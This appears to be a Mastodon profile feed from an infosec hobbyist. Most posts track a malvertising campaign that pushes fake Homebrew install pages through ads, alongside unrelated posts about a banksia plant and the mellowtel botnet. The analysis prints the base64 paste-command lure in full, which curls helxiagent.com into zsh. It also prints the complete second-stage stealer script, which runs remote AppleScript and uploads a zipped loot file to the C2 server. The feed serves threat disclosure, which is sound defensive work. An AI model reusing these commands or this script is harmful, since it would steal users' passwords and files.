Developer at a cybersecurity startup.
Infosec hobyist, hope that one day I'll actually be able to contribute.
Rarely complete projects (ask me about my honeypot, or pippin)
| https://twitter.com/fauxeccles | |
| GH | https://github.com/faux-eccles |
| pronouns | he/him |
RE: https://mastodon.social/@glyph/116467342354581349
Slightly different context but I've been trying to be mindful of this language in design/panning meetings as more often than not it's a sign I'm making assumptions about the thing being spoken about, and underselling a topic I don't fully understand.
RE: https://infosec.exchange/@eccles/116294997807124774
Oh rad this has the same MO as what I found, possibly the same campaign. Didn't even occur to me that it could be classified as *fix.
Though the claude version is doing a full domain copy, rather than making use of legitimate doc services
Oh man, all my angst, & look what I spotted when I checked the mail. I actually have lots of these, Banksia Spinulosa (Hairpin Banksia), but few have such red hairpins. It was so lovely I had to share! Ain't it a beaut? 😁
No scent, but an important local wildlife food source. I'm on Darug/Gundungurra country (spellings vary), referred to here:
https://fieldofmar-e.schools.nsw.gov.au/fact-sheets/plants/hairpin-banksia-fact-sheet
New page on slab, the copy paste code has changed though
https://urlscan.io/result/019d3c7f-457e-7030-8384-929181e511ed/
thefathippy'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8vaGVseGlhZ2VudC5jb20vY3VybC85MWMxMWQ0YzM1NmZkNzU0NzgwYzBhNWI4YzU4YjUwMjRlYThlYTFiMzdiYjg1ZGNhYTlmZWIwM2UwM2FkZDg3fHpzaA=='
piped into zsh.
Leads to https://urlscan.io/result/019d3c8c-9db9-77de-8159-d0d05b0ca1bb/ which appears to have some user-agent filtering, as with curl with get a similar second stage payload as before
new domain ioc helxiagent[.]com can't find anything about it though, appears to be heavily used in obfuscating the final drop
#!/bin/zsh
daemon_function() {
exec </dev/null
exec >/dev/null
exec 2>/dev/null
local domain="helxiagent.com"
local token="91c11d4c356fd754780c0a5b8c58b5024ea8ea1b37bb85dcaa9feb03e03add87"
local api_key="5190ef1733183a0dc63fb623357f56d6"
local file="/tmp/osalogging.zip"
if [ $# -gt 0 ]; then
curl -k -s --max-time 30 \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
"http://$domain/dynamic?txd=$token&pwd=$1" | osascript
else
curl -k -s --max-time 30 \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
"http://$domain/dynamic?txd=$token" | osascript
fi
if [ $? -ne 0 ]; then
exit 1
fi
if [[ ! -f "$file" || ! -s "$file" ]]; then
return 1
fi
local CHUNK_SIZE=$((10 * 1024 * 1024))
local MAX_RETRIES=8
local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
local total_size
total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
return 1
fi
local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
local i=0
while (( i < total_chunks )); do
local offset=$((i * CHUNK_SIZE))
local chunk_size=$CHUNK_SIZE
(( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
local success=0
local attempt=1
while (( attempt <= MAX_RETRIES && success == 0 )); do
http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
curl -k -s -X PUT \
--data-binary @- \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
--max-time 180 \
-o /dev/null \
-w "%{http_code}" \
"http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
curl_status=$?
if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
success=1
else
((attempt++))
sleep $((3 + attempt * 2))
fi
done
if (( success == 0 )); then
return 1
fi
((i++))
done
rm -f "$file"
return 0
}
if daemon_function "$@" & then
exit 0
else
exit 1
fi
Which appears to have been authored today using the same account name on a different service Mac Dev. The too platforms have in common are they make it hard to report accounts/published pages.
So new in fact the google ads transparency doesn't have this ad listed, nor any others for this domain
httpX://share.supernotes[.]app/scene+lecture+tooth+pupil/?gad_source=1&gad_campaignid=23690246307&gbraid=0AAAAADvuqr5J4xYKwmF7fO2d1qw_v-Lbe&gclid=CjwKCAjwspPOBhB9EiwATFbi5GITIyzMjnVnSz_HXDXqQECD00FGVRLHYJ1W6USLzFxmEp2G3W9QchoCvm4QAvD_BwE
In case anyone was wondering, #mellowtel still seems to be processing requests. If it's still via the browser botnet still I'm not sure, but I assume so.
Some queries I've noted,
- circumventing query restrictions for searching government business dbs
- loading Instagram pages
- using the perplexity API for determing product recommendations for various questions
- performing Google searches and extracting the AI result
Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com
Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd
Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata®ion=anywhere
I suspect it could be compromised ads account, that being said I can't actually find this ad listed in the transparency page
